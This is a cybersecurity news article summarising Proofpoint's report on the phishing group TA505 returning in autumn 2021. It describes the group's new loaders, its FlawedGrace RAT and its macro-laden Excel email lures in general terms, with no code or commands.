According to business security software vendor Proofpoint, TA505, a prominent email phishing threat actor, has risen from the grave. TA505, which had been inactive since 2020, resumed mass emailing efforts in September, equipped with fresh malware loaders and a RAT. 

The TA505 cybercrime organization has restarted its financial rip-off apparatus, bombarding malware at a variety of sectors into what are originally low-volume waves that researchers noticed spike late last month. 

The group, which aggressively targets a variety of businesses such as finance, retail, and hotels, has been functional since at least 2014. It is well-known for rapid virus changes and for influencing worldwide trends in illegal malware dissemination. 

It is responsible for one of the firm's largest spam efforts, the spread of the Dridex banking malware. Proofpoint has also identified the organization that is delivering the Locky and Jaff ransomware, the Trick banking trojan, and other malware "in very high volumes," according to the company. 

According to habit, the gang's most recent ads span a wide spectrum of sectors. They're additionally bringing new tools, such as an improved KiXtart loader, the MirrorBlast loader, which downloads Rebol script stagers, the retooled FlawedGrace RAT, and improved malicious Excel files.

Proofpoint researchers tracked renewed malware campaigns from TA505 that began slowly at the start of September – only with a few thousand emails per wave, disseminating malicious Excel attachments – and afterward ramped up the volume later in the month, resulting in tens to hundreds of thousands of emails by the end of September, according to an analysis published by the company. 

As per the report, several of the efforts, especially the larger ones, "strongly resemble" what the group was up to between 2019 and 2020, involving identical domain naming patterns, email lures, Excel file lures, and the distribution of the FlawedGrace RAT. TA505 utilized more targeted lures in the early September waves of email attacks, which didn't impact as many sectors as the more recent October 2021 operations, according to Proofpoint experts. 

Significant new advancements include an updated FlawedGrace RAT, as well as retooled intermediate loader phases written in Rebol and KiXtart. According to experts, the gang is utilizing a different downloader than the previously successful Get2 downloader. 

“The new downloaders perform similar functionality of reconnaissance and pulling in the next stages,” Proofpoint researchers noted. 

“The emails contained an Excel attachment that, when opened and macros enabled, would lead to the download and running of an MSI file,” Proofpoint said. MSI files are used to install software on a Windows system. “The MSI file, in turn, would execute an embedded Rebol loader, dubbed by Proofpoint as MirrorBlast.” 

Researchers also discovered that TA505 is now employing numerous intermediary loaders before the distribution of the FlawedGrace RAT, and they are written in unusual scripting languages — Rebol and KiXtart. 

The intermediary loaders appear to fulfill the very same purpose as Get2, a downloader used by TA505 since 2019 to distribute a range of secondary payloads, according to researchers. 

“The loaders perform minimal reconnaissance of an infected machine, such as collecting user domain and username information and downloading further payloads,” according to the research. 

“The code responsible for downloading the next stage MSI file was typically lightly obfuscated with filler characters, string reversing or similar simple functions and hidden in the document Comments, Title, in a Cell or other locations,” the researchers noted. 

Considering that TA505 alters TTP and is "considered a trendsetter in the world of cybercrime," Proofpoint does not anticipate them going anywhere any time soon. The malicious actors do not restrict its target set and are, in fact, an equal opportunist in terms of the regions and sectors it chooses to attack, researchers said. This, along with TA505's capacity to be adaptable, focusing on what is most profitable and altering its TTP as needed, makes the actor persistent threat.